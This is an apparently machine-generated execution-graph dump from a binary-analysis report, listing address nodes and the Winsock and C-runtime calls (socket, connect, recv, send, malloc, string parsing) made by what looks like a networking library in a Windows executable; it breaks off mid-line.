                                        execution_graph 47310 7ff6029b7e80 47311 7ff6029b7e91 47310->47311 47338 7ff6029ced30 47311->47338 47313 7ff6029b7ec5 47314 7ff6029b7ef7 47313->47314 47406 7ff6029c6400 47313->47406 47416 7ff6029cf780 314 API calls 47314->47416 47318 7ff6029b7f04 47319 7ff6029b7f07 47318->47319 47342 7ff6029b8e30 47319->47342 47326 7ff6029b8c23 47443 7ff6029c6280 19 API calls 47326->47443 47327 7ff6029b8c32 47328 7ff6029b8db0 17 API calls 47336 7ff6029b7b8b 47328->47336 47333 7ff6029b7c2e 47334 7ff6029c6280 19 API calls 47333->47334 47333->47336 47334->47333 47336->47326 47336->47327 47336->47328 47336->47333 47364 7ff6029c7b00 47336->47364 47370 7ff6029c6280 19 API calls 47336->47370 47371 7ff6029b7610 47336->47371 47417 7ff6029c1d40 47336->47417 47441 7ff6029b6330 15 API calls 47336->47441 47442 7ff6029d5af0 22 API calls 47336->47442 47339 7ff6029ced5a 47338->47339 47444 7ff6029cf860 47339->47444 47341 7ff6029ced79 47341->47313 47352 7ff6029b8e96 47342->47352 47343 7ff6029b9218 memcpy memcpy 47344 7ff6029b9100 47343->47344 47345 7ff6029fff10 8 API calls 47344->47345 47347 7ff6029b7f12 47345->47347 47346 7ff6029b8fde calloc 47346->47344 47351 7ff6029b8ff8 47346->47351 47347->47336 47358 7ff6029cf450 47347->47358 47348 7ff6029b9214 47348->47343 47350 7ff6029b90f7 free 47350->47344 47351->47344 47351->47350 47351->47352 47354 7ff6029ce410 malloc memcpy 47351->47354 47355 7ff6029b90ef 47351->47355 47474 7ff6029ce750 47351->47474 47352->47346 47352->47351 47353 7ff6029b910a 47352->47353 47353->47343 47353->47348 47480 7ff6029ce6e0 free 47353->47480 47354->47351 47479 7ff6029ce6e0 free 47355->47479 47359 7ff6029cf469 47358->47359 47481 7ff6029c27a0 47359->47481 47361 7ff6029cf480 47362 7ff6029b7e1c 47361->47362 47363 7ff6029c1d40 90 API calls 47361->47363 47362->47336 47405 7ff6029cbe90 free 47362->47405 47363->47362 47365 7ff6029c7b4a 47364->47365 47366 7ff6029ce0c0 2 API calls 47365->47366 47367 7ff6029c7b6a 47365->47367 47366->47367 47368 7ff6029fff10 8 API calls 47367->47368 47369 7ff6029c7bfe 47368->47369 47369->47336 47370->47336 47372 7ff6029b7722 47371->47372 47373 7ff6029b764c 47371->47373 47376 7ff6029fff10 8 API calls 47372->47376 47676 7ff6029bb860 47373->47676 47375 7ff6029b7657 free free 47379 7ff6029b7687 47375->47379 47377 7ff6029b7757 47376->47377 47377->47336 47378 7ff6029b76c5 47694 7ff6029b8db0 47378->47694 47379->47378 47704 7ff6029d55d0 22 API calls 47379->47704 47382 7ff6029b76df 47382->47372 47383 7ff6029b778c 47382->47383 47705 7ff6029cf7f0 free free free free 47382->47705 47698 7ff6029cee30 47383->47698 47387 7ff6029b77bb 47388 7ff6029b77c0 free 47387->47388 47388->47388 47389 7ff6029b77de 47388->47389 47390 7ff6029b790b 47389->47390 47391 7ff6029b7847 47389->47391 47393 7ff6029c1d40 90 API calls 47390->47393 47392 7ff6029c9790 13 API calls 47391->47392 47394 7ff6029b78a6 47392->47394 47395 7ff6029b793d 47393->47395 47706 7ff6029bf050 92 API calls 47394->47706 47709 7ff6029c1ec0 292 API calls 47395->47709 47398 7ff6029b78c7 47399 7ff6029b78f5 47398->47399 47400 7ff6029b78cb 47398->47400 47708 7ff6029c1ec0 292 API calls 47399->47708 47401 7ff6029c6400 15 API calls 47400->47401 47403 7ff6029b78e6 47401->47403 47707 7ff6029c1ec0 292 API calls 47403->47707 47405->47336 47407 7ff6029b7ef1 47406->47407 47408 7ff6029c6409 47406->47408 47407->47314 47407->47319 47415 7ff6029c64d9 47408->47415 47715 7ff6029c9890 13 API calls 47408->47715 47410 7ff6029fff10 8 API calls 47410->47407 47411 7ff6029c64c1 47413 7ff6029c650e fwrite fwrite 47411->47413 47411->47415 47412 7ff6029c645c 47412->47411 47414 7ff6029c9790 13 API calls 47412->47414 47413->47415 47414->47411 47415->47410 47416->47318 47418 7ff6029c1e7c 47417->47418 47420 7ff6029c1d62 47417->47420 47418->47336 47419 7ff6029c1d8f 47422 7ff6029cee30 9 API calls 47419->47422 47420->47418 47420->47419 47719 7ff6029cf7f0 free free free free 47420->47719 47423 7ff6029c1da2 47422->47423 47716 7ff6029f1620 47423->47716 47441->47336 47442->47336 47443->47327 47445 7ff6029cf8a0 47444->47445 47446 7ff6029cf8db 47445->47446 47447 7ff6029cf8c6 tolower 47445->47447 47459 7ff6029c9790 47446->47459 47447->47446 47447->47447 47449 7ff6029cf8f2 47450 7ff6029cf95c 47449->47450 47452 7ff6029cf938 tolower 47449->47452 47458 7ff6029cf9d1 47449->47458 47451 7ff6029cf996 _time64 47450->47451 47450->47458 47453 7ff6029cf9b5 47451->47453 47451->47458 47455 7ff6029c9790 13 API calls 47452->47455 47457 7ff6029c6400 15 API calls 47453->47457 47453->47458 47455->47450 47457->47458 47462 7ff6029fff10 47458->47462 47471 7ff6029ca150 13 API calls 47459->47471 47461 7ff6029c97c3 47461->47449 47463 7ff6029fff19 47462->47463 47464 7ff6029cf9fc 47463->47464 47465 7ff602a003b8 IsProcessorFeaturePresent 47463->47465 47464->47341 47466 7ff602a003d0 47465->47466 47472 7ff602a005ac RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 47466->47472 47468 7ff602a003e3 47473 7ff602a00384 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 47468->47473 47471->47461 47472->47468 47475 7ff6029ce806 47474->47475 47476 7ff6029ce767 47474->47476 47475->47351 47476->47475 47477 7ff6029ce787 malloc 47476->47477 47478 7ff6029ce7b6 47477->47478 47478->47351 47479->47350 47480->47353 47505 7ff6029d59a0 47481->47505 47484 7ff6029c27d5 47484->47361 47485 7ff6029c27fe free 47522 7ff6029c96c0 15 API calls 47485->47522 47486 7ff6029c2829 47492 7ff6029c2835 47486->47492 47508 7ff6029ce0c0 47486->47508 47489 7ff6029c285f 47490 7ff6029c28a1 47489->47490 47491 7ff6029c2873 47489->47491 47494 7ff6029d59a0 2 API calls 47490->47494 47511 7ff6029c7090 47491->47511 47492->47361 47496 7ff6029c28ae 47494->47496 47495 7ff6029c2889 47497 7ff6029c2891 47495->47497 47498 7ff6029ce0c0 2 API calls 47495->47498 47499 7ff6029c28d1 47496->47499 47500 7ff6029d59a0 2 API calls 47496->47500 47497->47361 47501 7ff6029c2964 47498->47501 47523 7ff6029c7c10 47499->47523 47500->47499 47501->47361 47504 7ff6029c6400 15 API calls 47504->47495 47506 7ff6029ce0c0 2 API calls 47505->47506 47507 7ff6029c27c5 47506->47507 47507->47484 47507->47485 47507->47486 47509 7ff6029ce0d2 QueryPerformanceCounter 47508->47509 47510 7ff6029ce10d GetTickCount 47508->47510 47509->47489 47510->47489 47512 7ff6029ce0c0 2 API calls 47511->47512 47513 7ff6029c70b3 47512->47513 47514 7ff6029c712b 47513->47514 47521 7ff6029c7144 47513->47521 47618 7ff6029c6280 19 API calls 47514->47618 47516 7ff6029c713a 47517 7ff6029c7251 47516->47517 47517->47495 47518 7ff6029c724d 47518->47517 47619 7ff6029b6100 17 API calls 47518->47619 47521->47518 47553 7ff6029c85d0 47521->47553 47522->47486 47524 7ff6029c7e43 47523->47524 47525 7ff6029c7c47 47523->47525 47526 7ff6029fff10 8 API calls 47524->47526 47525->47524 47527 7ff6029c7c61 getpeername 47525->47527 47528 7ff6029c28ea 47526->47528 47529 7ff6029c7c86 WSAGetLastError 47527->47529 47530 7ff6029c7cbd getsockname 47527->47530 47528->47495 47528->47504 47666 7ff6029b2e10 27 API calls 47529->47666 47532 7ff6029c7d10 WSAGetLastError 47530->47532 47533 7ff6029c7d47 47530->47533 47668 7ff6029b2e10 27 API calls 47532->47668 47670 7ff6029c6e40 19 API calls 47533->47670 47535 7ff6029c7ca3 47667 7ff6029c6280 19 API calls 47535->47667 47537 7ff6029c7d69 47540 7ff6029c7dad 47537->47540 47541 7ff6029c7d6d _errno _errno 47537->47541 47539 7ff6029c7d2d 47669 7ff6029c6280 19 API calls 47539->47669 47673 7ff6029c6e40 19 API calls 47540->47673 47671 7ff6029b2e10 27 API calls 47541->47671 47542 7ff6029c7cb8 47542->47524 47546 7ff6029c7d93 47672 7ff6029c6280 19 API calls 47546->47672 47547 7ff6029c7dff 47547->47524 47549 7ff6029c7e03 _errno _errno 47547->47549 47674 7ff6029b2e10 27 API calls 47549->47674 47551 7ff6029c7e29 47675 7ff6029c6280 19 API calls 47551->47675 47554 7ff6029c863f memcpy 47553->47554 47556 7ff6029c86a8 socket 47554->47556 47559 7ff6029c867b 47554->47559 47556->47559 47558 7ff6029fff10 8 API calls 47560 7ff6029c8b7b 47558->47560 47561 7ff6029c86e7 47559->47561 47611 7ff6029c8a04 47559->47611 47640 7ff6029d55a0 ioctlsocket 47559->47640 47560->47521 47562 7ff6029c8b0a _errno _errno _errno 47561->47562 47620 7ff6029f1ad0 47561->47620 47661 7ff6029b2e10 27 API calls 47562->47661 47565 7ff6029c8b3b 47662 7ff6029c6280 19 API calls 47565->47662 47566 7ff6029c8734 47566->47562 47567 7ff6029c873d htons 47566->47567 47569 7ff6029c6400 15 API calls 47567->47569 47571 7ff6029c875e 47569->47571 47570 7ff6029c8b50 47572 7ff6029c6ee0 2 API calls 47570->47572 47573 7ff6029c87d9 47571->47573 47574 7ff6029c877f setsockopt 47571->47574 47606 7ff6029c89e5 47572->47606 47580 7ff6029c8811 47573->47580 47642 7ff6029c9110 47573->47642 47574->47573 47575 7ff6029c87ad WSAGetLastError 47574->47575 47641 7ff6029b2e10 27 API calls 47575->47641 47576 7ff6029c8832 getsockopt 47581 7ff6029c8863 setsockopt 47576->47581 47582 7ff6029c8859 47576->47582 47577 7ff6029c8815 47585 7ff6029c889a setsockopt 47577->47585 47589 7ff6029c88d9 47577->47589 47580->47576 47580->47577 47581->47577 47582->47577 47582->47581 47583 7ff6029c87c7 47586 7ff6029c6400 15 API calls 47583->47586 47584 7ff6029c89a7 47588 7ff6029c89b8 47584->47588 47591 7ff6029c8a0e 47584->47591 47587 7ff6029c88c7 47585->47587 47593 7ff6029c88de 47585->47593 47586->47573 47590 7ff6029c6400 15 API calls 47587->47590 47650 7ff6029c7f40 596 API calls 47588->47650 47589->47584 47607 7ff6029c89f9 47589->47607 47590->47589 47639 7ff6029d55a0 ioctlsocket 47591->47639 47596 7ff6029c890c WSAIoctl 47593->47596 47595 7ff6029c8a1b 47598 7ff6029ce0c0 2 API calls 47595->47598 47596->47589 47600 7ff6029c8954 WSAGetLastError 47596->47600 47597 7ff6029c89d4 47597->47591 47601 7ff6029c89da 47597->47601 47599 7ff6029c8a25 47598->47599 47605 7ff6029c8a4f 47599->47605 47659 7ff6029b6100 17 API calls 47599->47659 47602 7ff6029c6400 15 API calls 47600->47602 47651 7ff6029c6ee0 47601->47651 47602->47589 47609 7ff6029c8a6f connect 47605->47609 47610 7ff6029c8a98 WSAGetLastError 47605->47610 47605->47611 47606->47611 47608 7ff6029c6ee0 2 API calls 47607->47608 47608->47611 47609->47610 47609->47611 47610->47611 47612 7ff6029c8aa5 47610->47612 47611->47558 47612->47611 47660 7ff6029b2e10 27 API calls 47612->47660 47614 7ff6029c8ac1 47618->47516 47619->47517 47621 7ff6029f1adf 47620->47621 47622 7ff6029f1b09 47620->47622 47623 7ff6029f1ae4 _errno 47621->47623 47631 7ff6029f1af7 47621->47631 47624 7ff6029c9790 13 API calls 47622->47624 47623->47566 47626 7ff6029f1b78 47624->47626 47625 7ff6029f1bc4 _errno 47627 7ff6029f1b97 47625->47627 47626->47625 47626->47627 47628 7ff6029fff10 8 API calls 47627->47628 47629 7ff6029f1bdf 47628->47629 47629->47566 47630 7ff6029c9790 13 API calls 47630->47631 47631->47630 47632 7ff6029f1e6a 47631->47632 47636 7ff6029f1df0 47631->47636 47663 7ff6029f1b20 14 API calls 47632->47663 47634 7ff6029f1e83 _errno 47635 7ff6029f1e19 47634->47635 47637 7ff6029fff10 8 API calls 47635->47637 47636->47634 47636->47635 47638 7ff6029f1e57 47637->47638 47638->47566 47639->47595 47640->47561 47641->47583 47643 7ff6029c913d 47642->47643 47644 7ff6029c91ef VerSetConditionMask VerSetConditionMask VerSetConditionMask VerSetConditionMask 47643->47644 47647 7ff6029c9155 47643->47647 47645 7ff6029c9232 VerSetConditionMask 47644->47645 47646 7ff6029c9244 VerifyVersionInfoA 47644->47646 47645->47646 47646->47647 47648 7ff6029fff10 8 API calls 47647->47648 47649 7ff6029c927b 47648->47649 47649->47580 47650->47597 47652 7ff6029c6f20 closesocket 47651->47652 47653 7ff6029c6ef5 47651->47653 47652->47606 47654 7ff6029c6f36 47653->47654 47656 7ff6029c6f11 47653->47656 47665 7ff6029b6410 free 47654->47665 47664 7ff6029b6410 free 47656->47664 47658 7ff6029c6f3e 47658->47606 47659->47605 47660->47614 47661->47565 47662->47570 47663->47636 47664->47652 47665->47658 47666->47535 47667->47542 47668->47539 47669->47542 47670->47537 47671->47546 47672->47542 47673->47547 47674->47551 47675->47542 47677 7ff6029bb875 47676->47677 47678 7ff6029bb887 47676->47678 47677->47678 47679 7ff6029bb87b 47677->47679 47680 7ff6029bba24 free 47678->47680 47681 7ff6029bb998 EnterCriticalSection LeaveCriticalSection 47678->47681 47710 7ff6029d96b0 WaitForSingleObjectEx CloseHandle 47679->47710 47680->47375 47683 7ff6029bb9d1 CloseHandle 47681->47683 47684 7ff6029bb9db 47681->47684 47686 7ff6029bb9fc 47683->47686 47687 7ff6029bb9e1 47684->47687 47688 7ff6029bb9e9 47684->47688 47685 7ff6029bb880 47685->47678 47690 7ff6029bba11 closesocket 47686->47690 47713 7ff6029b6410 free 47686->47713 47711 7ff6029d96b0 WaitForSingleObjectEx CloseHandle 47687->47711 47712 7ff6029bba40 7 API calls 47688->47712 47690->47680 47692 7ff6029bb9f2 free 47692->47686 47695 7ff6029b8e00 47694->47695 47696 7ff6029b8dc7 47694->47696 47695->47382 47714 7ff6029b6100 17 API calls 47696->47714 47699 7ff6029ceeaa 47698->47699 47703 7ff6029cee51 47698->47703 47700 7ff6029fff10 8 API calls 47699->47700 47702 7ff6029b779b free 47700->47702 47701 7ff6029cee73 _time64 47701->47699 47702->47387 47702->47389 47703->47699 47703->47701 47704->47378 47705->47383 47706->47398 47710->47685 47711->47688 47712->47692 47713->47690 47714->47695 47715->47412 47720 7ff6029f4ba0 8 API calls 47716->47720 47718 7ff6029f1635 47719->47419 47720->47718 47721 7ff6029bb520 47722 7ff6029bb574 47721->47722 47723 7ff6029bb564 47721->47723 47725 7ff6029ce0c0 2 API calls 47722->47725 47766 7ff6029cea00 47723->47766 47726 7ff6029bb5b6 47725->47726 47732 7ff6029bbbc0 calloc 47726->47732 47729 7ff6029bb5de 47773 7ff6029c6280 19 API calls 47729->47773 47730 7ff6029bb5d5 47733 7ff6029bbc11 malloc 47732->47733 47734 7ff6029bbd4e _errno 47732->47734 47735 7ff6029bbcc7 47733->47735 47736 7ff6029bbc9c InitializeCriticalSectionEx 47733->47736 47758 7ff6029bb5d1 47734->47758 47738 7ff6029bbcf0 free 47735->47738 47739 7ff6029bbce0 DeleteCriticalSection free 47735->47739 47774 7ff6029d5370 socket 47736->47774 47741 7ff6029bbd03 47738->47741 47742 7ff6029bbd08 47738->47742 47739->47738 47794 7ff6029d8f90 free free free 47741->47794 47744 7ff6029bbd12 closesocket 47742->47744 47745 7ff6029bbd18 free 47742->47745 47744->47745 47745->47734 47746 7ff6029bbd76 _strdup 47746->47735 47747 7ff6029bbd90 free _strdup 47746->47747 47748 7ff6029bbdde 47747->47748 47749 7ff6029bbdb2 47747->47749 47751 7ff6029bbe61 free 47748->47751 47752 7ff6029bbdea EnterCriticalSection LeaveCriticalSection 47748->47752 47793 7ff6029d9660 _beginthreadex 47749->47793 47751->47734 47754 7ff6029bbe25 47752->47754 47755 7ff6029bbe14 CloseHandle 47752->47755 47753 7ff6029bbdc6 47753->47758 47759 7ff6029bbdce _errno 47753->47759 47756 7ff6029bbe32 47754->47756 47757 7ff6029bbe2a 47754->47757 47760 7ff6029bbe48 47755->47760 47796 7ff6029bba40 7 API calls 47756->47796 47795 7ff6029d96b0 WaitForSingleObjectEx CloseHandle 47757->47795 47758->47729 47758->47730 47759->47748 47763 7ff6029bbe58 closesocket 47760->47763 47797 7ff6029b6410 free 47760->47797 47763->47751 47764 7ff6029bbe3b free 47764->47760 47767 7ff6029cea1f socket 47766->47767 47768 7ff6029cea09 47766->47768 47769 7ff6029cea35 47767->47769 47770 7ff6029cea3c 47767->47770 47768->47722 47769->47722 47771 7ff6029c6ee0 2 API calls 47770->47771 47772 7ff6029cea46 47771->47772 47772->47722 47773->47730 47775 7ff6029d53c5 htonl setsockopt 47774->47775 47778 7ff6029d53c0 47774->47778 47776 7ff6029d5424 bind 47775->47776 47777 7ff6029d554b closesocket closesocket closesocket 47775->47777 47776->47777 47780 7ff6029d543f getsockname 47776->47780 47777->47778 47779 7ff6029fff10 8 API calls 47778->47779 47781 7ff6029bbcbf 47779->47781 47780->47777 47782 7ff6029d545b listen 47780->47782 47781->47735 47781->47746 47782->47777 47783 7ff6029d5470 socket 47782->47783 47783->47777 47784 7ff6029d548b connect 47783->47784 47784->47777 47785 7ff6029d54a6 accept 47784->47785 47785->47777 47786 7ff6029d54c2 47785->47786 47787 7ff6029c9790 13 API calls 47786->47787 47788 7ff6029d54d9 send 47787->47788 47788->47777 47790 7ff6029d550a recv 47788->47790 47790->47777 47791 7ff6029d5528 memcmp 47790->47791 47791->47777 47792 7ff6029d553e closesocket 47791->47792 47792->47778 47793->47753 47794->47742 47795->47756 47796->47764 47797->47763 47798 7ff6029b89c5 47799 7ff6029b89d4 47798->47799 47803 7ff6029b89f3 47798->47803 47800 7ff6029b89e5 47799->47800 47801 7ff6029b8db0 17 API calls 47799->47801 47802 7ff6029b7610 292 API calls 47800->47802 47801->47800 47802->47803 47810 7ff6029b7b8b 47803->47810 47819 7ff6029b6330 15 API calls 47803->47819 47805 7ff6029b8db0 17 API calls 47805->47810 47807 7ff6029b8c32 47808 7ff6029b8c23 47822 7ff6029c6280 19 API calls 47808->47822 47810->47805 47810->47807 47810->47808 47811 7ff6029c1d40 90 API calls 47810->47811 47813 7ff6029c7b00 10 API calls 47810->47813 47814 7ff6029b7c2e 47810->47814 47817 7ff6029b7610 292 API calls 47810->47817 47818 7ff6029c6280 19 API calls 47810->47818 47820 7ff6029b6330 15 API calls 47810->47820 47821 7ff6029d5af0 22 API calls 47810->47821 47811->47810 47813->47810 47814->47810 47815 7ff6029c6280 19 API calls 47814->47815 47815->47814 47817->47810 47818->47810 47819->47810 47820->47810 47821->47810 47822->47807 47823 7ff6029efb01 47824 7ff6029efb0c 47823->47824 47827 7ff6029efb75 calloc 47824->47827 47857 7ff6029eef90 8 API calls 47824->47857 47826 7ff6029efb6d 47826->47827 47828 7ff6029efc0b 47826->47828 47829 7ff6029efa11 47827->47829 47830 7ff6029efb8f 47827->47830 47860 7ff6029eeb50 29 API calls 47828->47860 47852 7ff6029f0040 47830->47852 47833 7ff6029efc1b free 47833->47829 47835 7ff6029efc35 calloc 47833->47835 47838 7ff6029efc52 47835->47838 47839 7ff6029efa0b free 47835->47839 47836 7ff6029efbf3 47859 7ff6029efe00 12 API calls 47836->47859 47837 7ff6029efba3 47858 7ff6029efe00 12 API calls 47837->47858 47842 7ff6029f0040 92 API calls 47838->47842 47839->47829 47845 7ff6029efc5d free 47842->47845 47846 7ff6029efc6c 47845->47846 47847 7ff6029efcb9 47845->47847 47861 7ff6029efe00 12 API calls 47846->47861 47862 7ff6029efe00 12 API calls 47847->47862 47863 7ff6029f0090 47852->47863 47855 7ff6029efb9d 47855->47836 47855->47837 47857->47826 47860->47833 47864 7ff6029f00dc 47863->47864 47883 7ff6029f045d 47863->47883 47867 7ff6029f00fc malloc 47864->47867 47864->47883 47865 7ff6029fff10 8 API calls 47866 7ff6029f0052 47865->47866 47866->47855 47934 7ff6029efe00 12 API calls 47866->47934 47871 7ff6029f011a 47867->47871 47867->47883 47868 7ff6029f019a 47869 7ff6029f0205 memcpy 47868->47869 47870 7ff6029f04bf 47868->47870 47868->47883 47869->47870 47874 7ff6029f04d9 memcpy 47870->47874 47870->47883 47871->47868 47872 7ff6029f0182 tolower 47871->47872 47873 7ff6029f021a 47871->47873 47872->47868 47872->47871 47876 7ff6029f0251 _strdup 47873->47876 47879 7ff6029f0417 47873->47879 47875 7ff6029f04f0 _strdup 47874->47875 47877 7ff6029f0404 47874->47877 47875->47877 47875->47883 47876->47883 47893 7ff6029f0295 47876->47893 47881 7ff6029f05a9 47877->47881 47900 7ff6029c9790 13 API calls 47877->47900 47879->47883 47885 7ff6029f0479 strcspn 47879->47885 47880 7ff6029f0374 strcspn 47880->47883 47891 7ff6029f03a2 47880->47891 47884 7ff6029f05ca strchr 47881->47884 47883->47865 47886 7ff6029f05fc strchr 47884->47886 47887 7ff6029f05dc 47884->47887 47885->47868 47885->47883 47889 7ff6029f060e _strdup 47886->47889 47890 7ff6029f0628 47886->47890 47887->47886 47888 7ff6029f05e5 _strdup 47887->47888 47888->47883 47888->47886 47889->47883 47889->47890 47895 7ff6029f068a 47890->47895 47896 7ff6029f0637 47890->47896 47899 7ff6029f069c 47890->47899 47891->47884 47891->47891 47894 7ff6029f03cb malloc 47891->47894 47892 7ff6029f0369 memcpy 47892->47880 47893->47880 47893->47883 47893->47892 47894->47883 47897 7ff6029f03e5 47894->47897 47898 7ff6029f0690 _strdup 47895->47898 47895->47899 47935 7ff6029fd910 11 API calls 47896->47935 47897->47877 47897->47881 47898->47899 47899->47883 47901 7ff6029f0a25 free free 47899->47901 47903 7ff6029f06ca strcspn 47899->47903 47900->47877 47901->47883 47903->47883 47904 7ff6029f06e3 strchr 47903->47904 47905 7ff6029f07c3 47904->47905 47906 7ff6029f070d 47904->47906 47911 7ff6029f07c7 free free free 47905->47911 47908 7ff6029f0726 47906->47908 47907 7ff6029f063f 47907->47883 47909 7ff6029f0681 free 47907->47909 47910 7ff6029f0668 47907->47910 47936 7ff6029c2570 13 API calls 47908->47936 47909->47895 47912 7ff6029f066e free 47910->47912 47913 7ff6029f0678 47910->47913 47911->47883 47914 7ff6029f0795 47911->47914 47912->47913 47913->47899 47937 7ff6029bb430 __stdio_common_vsscanf 47914->47937 47917 7ff6029f07ac 47918 7ff6029f07b5 47917->47918 47919 7ff6029f083c strchr 47917->47919 47918->47883 47924 7ff6029f07bd 47918->47924 47938 7ff6029bb430 __stdio_common_vsscanf 47918->47938 47920 7ff6029f085d 47919->47920 47919->47924 47920->47920 47925 7ff6029f0889 _strdup 47920->47925 47939 7ff6029efe90 21 API calls 47920->47939 47921 7ff6029f0777 47921->47914 47922 7ff6029f0756 47922->47911 47922->47921 47924->47883 47924->47920 47927 7ff6029f08e9 strtol 47924->47927 47925->47883 47933 7ff6029f089f 47925->47933 47927->47883 47929 7ff6029f0908 47927->47929 47928 7ff6029f0881 47928->47883 47928->47925 47929->47883 47930 7ff6029c9790 13 API calls 47929->47930 47931 7ff6029f092f _strdup 47930->47931 47931->47883 47931->47920 47932 7ff6029f0a12 _strdup 47932->47883 47932->47901 47933->47901 47933->47932 47935->47907 47936->47922 47937->47917 47938->47924 47939->47928 47940 7ff6029d1da0 47943 7ff6029c0480 47940->47943 47942 7ff6029d1db7 47944 7ff6029c04ae 47943->47944 47945 7ff6029c04a7 47943->47945 47946 7ff6029c04d4 47944->47946 47948 7ff6029c04dd 47944->47948 47949 7ff6029c0517 47944->47949 47992 7ff6029c0e60 memset 47945->47992 47993 7ff6029c6280 19 API calls 47946->47993 47956 7ff6029da390 47948->47956 47974 7ff6029d9700 47948->47974 47949->47942 47951 7ff6029c0502 47951->47949 47953 7ff6029d59a0 2 API calls 47951->47953 47952 7ff6029c0527 47952->47949 47953->47949 47957 7ff6029da3e4 47956->47957 47973 7ff6029da3d9 47956->47973 47958 7ff6029c7b00 10 API calls 47957->47958 47969 7ff6029da40b 47957->47969 47960 7ff6029da3f7 47958->47960 47959 7ff6029da502 47959->47973 48140 7ff6029dbaf0 69 API calls 47959->48140 47962 7ff6029da4ec 47960->47962 47994 7ff6029da580 47960->47994 47961 7ff6029c7b00 10 API calls 47961->47969 48139 7ff6029c6280 19 API calls 47962->48139 47966 7ff6029da4e5 47966->47973 47969->47959 47969->47961 47969->47962 47970 7ff6029da4cd WSAGetLastError 47969->47970 47972 7ff6029da4bc 47969->47972 47969->47973 48048 7ff6029d68f0 47969->48048 48072 7ff6029db360 47969->48072 48138 7ff6029c6280 19 API calls 47970->48138 47972->47962 47972->47973 47973->47951 47975 7ff6029da390 47974->47975 47976 7ff6029c7b00 10 API calls 47975->47976 47980 7ff6029da3d9 47975->47980 47988 7ff6029da40b 47975->47988 47978 7ff6029da3f7 47976->47978 47977 7ff6029da502 47977->47980 48209 7ff6029dbaf0 69 API calls 47977->48209 47981 7ff6029da4ec 47978->47981 47983 7ff6029da580 74 API calls 47978->47983 47979 7ff6029c7b00 10 API calls 47979->47988 47980->47951 48208 7ff6029c6280 19 API calls 47981->48208 47983->47988 47985 7ff6029da4e5 47985->47980 47986 7ff6029db360 254 API calls 47986->47988 47987 7ff6029d68f0 19 API calls 47987->47988 47988->47977 47988->47979 47988->47980 47988->47981 47988->47986 47988->47987 47989 7ff6029da4cd WSAGetLastError 47988->47989 47991 7ff6029da4bc 47988->47991 48207 7ff6029c6280 19 API calls 47989->48207 47991->47980 47991->47981 47992->47944 47993->47952 47995 7ff6029da5f2 47994->47995 47996 7ff6029c9110 14 API calls 47995->47996 47997 7ff6029da62e 47996->47997 47998 7ff6029da641 47997->47998 47999 7ff6029c6400 15 API calls 47997->47999 48000 7ff6029da64a GetModuleHandleA GetProcAddress 47998->48000 48004 7ff6029da688 47998->48004 47999->47998 48001 7ff6029da66c 48000->48001 48000->48004 48002 7ff6029c9110 14 API calls 48001->48002 48003 7ff6029da680 48002->48003 48003->48004 48005 7ff6029c9110 14 API calls 48004->48005 48010 7ff6029da6e5 48004->48010 48006 7ff6029da6e1 48005->48006 48007 7ff6029da6f2 48006->48007 48006->48010 48158 7ff6029c6280 19 API calls 48007->48158 48009 7ff6029db017 48141 7ff6029d8210 48009->48141 48010->48009 48018 7ff6029da833 48010->48018 48012 7ff6029fff10 8 API calls 48013 7ff6029db31c 48012->48013 48013->47969 48014 7ff6029db03f 48016 7ff6029c6400 15 API calls 48014->48016 48019 7ff6029db052 48014->48019 48015 7ff6029db02c 48015->48014 48017 7ff6029d8210 13 API calls 48015->48017 48016->48019 48017->48014 48159 7ff6029c6280 19 API calls 48018->48159 48023 7ff6029c6400 15 API calls 48019->48023 48025 7ff6029db09b 48019->48025 48021 7ff6029db00e 48021->48009 48024 7ff6029db166 48021->48024 48022 7ff6029db0fd calloc 48026 7ff6029db170 48022->48026 48027 7ff6029db157 48022->48027 48023->48025 48024->48012 48025->48022 48026->48024 48029 7ff6029db27c 48026->48029 48030 7ff6029db1d9 free 48026->48030 48160 7ff6029c6280 19 API calls 48027->48160 48155 7ff6029c6b40 48029->48155 48031 7ff6029db20a 48030->48031 48032 7ff6029db256 48030->48032 48035 7ff6029db212 48031->48035 48036 7ff6029db230 48031->48036 48165 7ff6029b2620 22 API calls 48032->48165 48161 7ff6029b2620 22 API calls 48035->48161 48163 7ff6029b2620 22 API calls 48036->48163 48039 7ff6029db260 48166 7ff6029c6280 19 API calls 48039->48166 48041 7ff6029db23a 48164 7ff6029c6280 19 API calls 48041->48164 48043 7ff6029db219 48162 7ff6029c6280 19 API calls 48043->48162 48045 7ff6029da701 48045->48024 48049 7ff6029d6937 48048->48049 48053 7ff6029d696b 48048->48053 48050 7ff6029d6941 48049->48050 48049->48053 48051 7ff6029d695b Sleep 48050->48051 48052 7ff6029d6948 WSASetLastError 48050->48052 48061 7ff6029d6964 48050->48061 48051->48061 48052->48061 48056 7ff6029d6ab5 48053->48056 48057 7ff6029d6ae3 select 48053->48057 48055 7ff6029fff10 8 API calls 48058 7ff6029d6c1e 48055->48058 48059 7ff6029d6ac3 WSASetLastError 48056->48059 48060 7ff6029d6ad6 Sleep 48056->48060 48062 7ff6029d6aba 48056->48062 48057->48062 48058->47969 48059->48062 48060->48062 48061->48055 48062->48061 48063 7ff6029d6b82 __WSAFDIsSet __WSAFDIsSet 48062->48063 48064 7ff6029d6bac 48062->48064 48063->48064 48065 7ff6029d6bb4 __WSAFDIsSet 48064->48065 48066 7ff6029d6bdb 48064->48066 48067 7ff6029d6bca __WSAFDIsSet 48065->48067 48068 7ff6029d6bc7 48065->48068 48066->48061 48069 7ff6029d6be3 __WSAFDIsSet 48066->48069 48067->48066 48068->48067 48070 7ff6029d6bf6 48069->48070 48071 7ff6029d6bf9 __WSAFDIsSet 48069->48071 48070->48071 48071->48061 48074 7ff6029db3d0 48072->48074 48073 7ff6029dbacf 48074->48073 48075 7ff6029db472 48074->48075 48076 7ff6029db432 malloc 48074->48076 48077 7ff6029db4c3 48075->48077 48078 7ff6029db478 malloc 48075->48078 48076->48073 48076->48075 48079 7ff6029db4d6 realloc 48077->48079 48081 7ff6029db530 48077->48081 48078->48073 48078->48077 48080 7ff6029db4f2 48079->48080 48079->48081 48192 7ff6029c6280 19 API calls 48080->48192 48085 7ff6029db575 48081->48085 48189 7ff6029c6600 recv 48081->48189 48084 7ff6029db5ba malloc 48084->48073 48086 7ff6029db657 memcpy 48084->48086 48085->48084 48089 7ff6029db7ca 48085->48089 48094 7ff6029db501 48085->48094 48087 7ff6029db677 free 48086->48087 48086->48094 48087->48094 48095 7ff6029db6e9 48087->48095 48088 7ff6029fff10 8 API calls 48090 